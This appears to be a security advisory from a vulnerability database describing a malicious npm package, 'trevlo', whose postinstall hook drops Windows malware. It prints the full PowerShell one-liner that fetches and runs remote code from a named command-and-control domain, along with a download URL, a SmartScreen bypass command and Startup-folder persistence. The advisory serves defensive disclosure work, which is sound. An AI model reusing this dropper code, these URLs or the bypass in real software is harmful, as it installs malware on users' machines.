VDB

GCVE-110-OSM-2026-2238

GCVE-110-OSM-2026-2238
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 14, 2026
Fetches and executes a remote PowerShell payload from `gusikkwski.top` at install time on Windows. Stage 2 downloads `HubSync387.exe` (52.7 MB PE64, WinosStager), strips Zone.Identifier to bypass SmartScreen, sets hidden attribute, and installs persistence in the Startup folder. **Trigger** (`postinstall`): executes `node ./lib/configure.js` at install time. **Platform gate**: exits immediately on non-Windows (`process.platform != 'win32'`). **Stage 1 — PowerShell dropper**: constructs inline PowerShell command `[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;&([scriptblock]::Create(((Invoke-WebRequest -Uri 'https://gusikkwski.top/s/d89728b820e59b2ac5a78ece' -UseBasicParsing).Content)))`, encodes it as UTF-16LE base64, and launches it via `cmd.exe /d /s /c start "" powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand <b64>` in a detached, unreferenced child process. **Stage 2 — EXE dropper** (fetched from C2 at `https://gusikkwski.top/s/d89728b820e59b2ac5a78ece`): downloads `HubSync387.exe` from `https://gusikkwski.top/dl/d89728b820e59b2ac5a78ece` with three write-path retries (Startup folder → %APPDATA% → %LOCALAPPDATA% → %TEMP%); removes `Zone.Identifier` ADS (`Remove-Item ($path+':Zone.Identifier')`) to defeat SmartScreen; sets hidden file attribute. **Stage 3 — binary** (`HubSync387.exe`, 52.7 MB PE64, SHA256 `cb6567ca182b9ec02d50d76030838f36754e65aeb209e19e679d24634f6b276b`): masquerades as `node.exe`; VT 3/70; matched YARA rules WinosStager and skip20_sqllang_hook; consistent with appended-payload stager pattern. **Persistence**: first write attempt targets `%STARTUP%\HubSync387.exe` — survives reboot. **C2 infrastructure**: `gusikkwski.top` registered 2026-04-11 (2 days before package publish), NameSilo, Cloudflare-proxied, WHOIS privacy — purpose-built C2.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowntrevloall versions (affected)

References

vendor

Browse GCVE Records

72,921 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›